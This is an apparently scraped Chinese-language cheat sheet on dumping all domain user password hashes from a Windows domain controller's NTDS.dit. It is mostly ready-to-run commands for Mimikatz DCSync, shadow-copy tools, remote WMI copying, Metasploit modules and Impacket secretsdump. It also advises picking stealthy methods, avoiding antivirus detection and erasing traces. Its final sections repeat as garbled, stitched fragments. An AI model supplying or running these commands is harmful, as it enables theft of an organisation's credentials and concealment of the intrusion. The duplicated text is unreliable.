域内用户Hash提取技术全集<\/h1>

概述<\/h2>
在渗透测试中，当获得域管理员权限后，提取域内所有用户的密码哈希是常见操作。这些哈希存储在域控制器的NTDS.DIT文件中，包含用户密码哈希、组成员关系等信息。<\/p>

NTDS.DIT文件位置<\/h2>

默认路径：<\/p>

C:\Windows\NTDS\NTDS.dit
<\/code><\/pre>
提取方法分类<\/h2>
1. 使用Mimikatz<\/h3>
DCSync技术<\/h4>
利用目录复制服务(DRS)从NTDS.DIT检索哈希，无需直接访问域控制器。<\/p>
基本命令：<\/p>
lsadump::dcsync \/domain:域名 \/all \/csv
<\/code><\/pre>
提取特定用户：<\/p>
lsadump::dcsync \/domain:域名 \/user:用户名
<\/code><\/pre>
直接提取<\/h4>
在域控制器上执行：<\/p>
privilege::debug
lsadump::lsa \/inject
<\/code><\/pre>
2. Empire框架<\/h3>
使用DCSync模块：<\/p>
usemodule credentials\/mimikatz\/dcsync_hashdump
<\/code><\/pre>
3. Nishang工具<\/h3>
使用VSS脚本：<\/p>
Import-Module .\Copy-VSS.ps1
<\/span><\/span>Copy-VSS
<\/span><\/span>Copy-VSS -DestinationDir 目标路径<\/span>
<\/span><\/span><\/code><\/pre>4. PowerSploit<\/h3>
使用VolumeShadowCopyTools：<\/p>
Import-Module .\VolumeShadowCopyTools.ps1
<\/span><\/span>New-VolumeShadowCopy -Volume C:\
<\/span><\/span>Get-VolumeShadowCopy
<\/span><\/span><\/code><\/pre>5. Invoke-DCSync<\/h3>
PowerShell脚本：<\/p>
Invoke-DCSync
<\/span><\/span>Invoke-DCSync -PWDumpFormat
<\/span><\/span><\/code><\/pre>6. NTDSUTIL工具<\/h3>
创建NTDS.dit快照：<\/p>
ntdsutil
activate instance ntds
ifm
create full 输出路径
quit
quit
<\/code><\/pre>
7. DiskShadow<\/h3>
使用脚本模式：<\/p>
diskshadow.exe \/s 脚本文件
<\/code><\/pre>
脚本示例内容：<\/p>
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" \/c copy z:\windows\ntds\ntds.dit 目标路径\ntds.dit
delete shadows volume %someAlias%
reset
<\/code><\/pre>
8. WMI远程提取<\/h3>
创建卷影副本：<\/p>
wmic \/node:DC \/user:域\用户 \/password:密码 process call create "cmd \/c vssadmin create shadow \/for=C: 2>&1"
<\/code><\/pre>
复制NTDS.dit：<\/p>
wmic \/node:DC \/user:域\用户 \/password:密码 process call create "cmd \/c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit 目标路径\ntds.dit 2>&1"
<\/code><\/pre>
复制SYSTEM文件：<\/p>
wmic \/node:DC \/user:域\用户 \/password:密码 process call create "cmd \/c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ 目标路径\SYSTEM.hive 2>&1"
<\/code><\/pre>
9. VSSADMIN<\/h3>
基本命令：<\/p>
vssadmin create shadow \/for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit 目标路径
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM 目标路径
<\/code><\/pre>
10. vssown脚本<\/h3>
使用步骤：<\/p>
cscript vssown.vbs \/start
cscript vssown.vbs \/create c
cscript vssown.vbs \/list
cscript vssown.vbs \/delete
<\/code><\/pre>
11. Metasploit框架<\/h3>
使用模块：<\/p>
use auxiliary\/admin\/smb\/psexec_ntdsgrab
<\/code><\/pre>
后渗透模块：<\/p>
use windows\/gather\/credentials\/domain_hashdump
<\/code><\/pre>
直接提取：<\/p>
hashdump
<\/code><\/pre>
12. fgdump工具<\/h3>
基本使用：<\/p>
fgdump.exe
<\/code><\/pre>
查看结果：<\/p>
type 127.0.0.1.pwdump
<\/code><\/pre>
13. Impacket工具集<\/h3>
使用secretsdump：<\/p>
impacket-secretsdump -system SYSTEM文件 -ntds ntds.dit LOCAL
<\/code><\/pre>
远程提取：<\/p>
impacket-secretsdump -hashes LMHASH:NTHASH -just-dc 域\/DC$@IP
<\/code><\/pre>
14. NTDSDumpEx工具<\/h3>
基本命令：<\/p>
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
<\/code><\/pre>
15. adXtract脚本<\/h3>
使用方式：<\/p>
.\/adXtract.sh ntds.dit SYSTEM 域名
<\/code><\/pre>
注意事项<\/h2>

大多数方法需要域管理员权限<\/li>
直接使用hashdump可能导致域控制器崩溃<\/li>
fgdump等工具可能被防病毒软件检测<\/li>
尽量选择隐蔽的方法如DCSync<\/li>
提取后需要SYSTEM文件配合解析NTDS.dit<\/li>
<\/ol>
最佳实践建议<\/h2>

优先使用DCSync技术（Mimikatz或Empire）<\/li>
远程操作时考虑使用WMI或Metasploit模块<\/li>
离线解析时使用Impacket工具集<\/li>
注意清理操作痕迹<\/li>
避免在业务高峰期操作以防影响服务<\/li>
<\/ol>

域内用户Hash提取技术全集<\/h1>

概述<\/h2> 在渗透测试中，当获得域管理员权限后，提取域内所有用户的密码哈希是常见操作。这些哈希存储在域控制器的NTDS.DIT文件中，包含用户密码哈希、组成员关系等信息。<\/p>

提取方法分类<\/h2>

1. 使用Mimikatz<\/h3>

最佳实践建议<\/h2> 优先使用DCSync技术（Mimikatz或Empire）<\/li> 远程操作时考虑使用WMI或Metasploit模块<\/li> 离线解析时使用Impacket工具集<\/li> 注意清理操作痕迹<\/li> 避免在业务高峰期操作以防影响服务<\/li> <\/ol>

概述<\/h2>
在渗透测试中，当获得域管理员权限后，提取域内所有用户的密码哈希是常见操作。这些哈希存储在域控制器的NTDS.DIT文件中，包含用户密码哈希、组成员关系等信息。<\/p>

最佳实践建议<\/h2>

优先使用DCSync技术（Mimikatz或Empire）<\/li>
远程操作时考虑使用WMI或Metasploit模块<\/li>
离线解析时使用Impacket工具集<\/li>
注意清理操作痕迹<\/li>
避免在业务高峰期操作以防影响服务<\/li> <\/ol>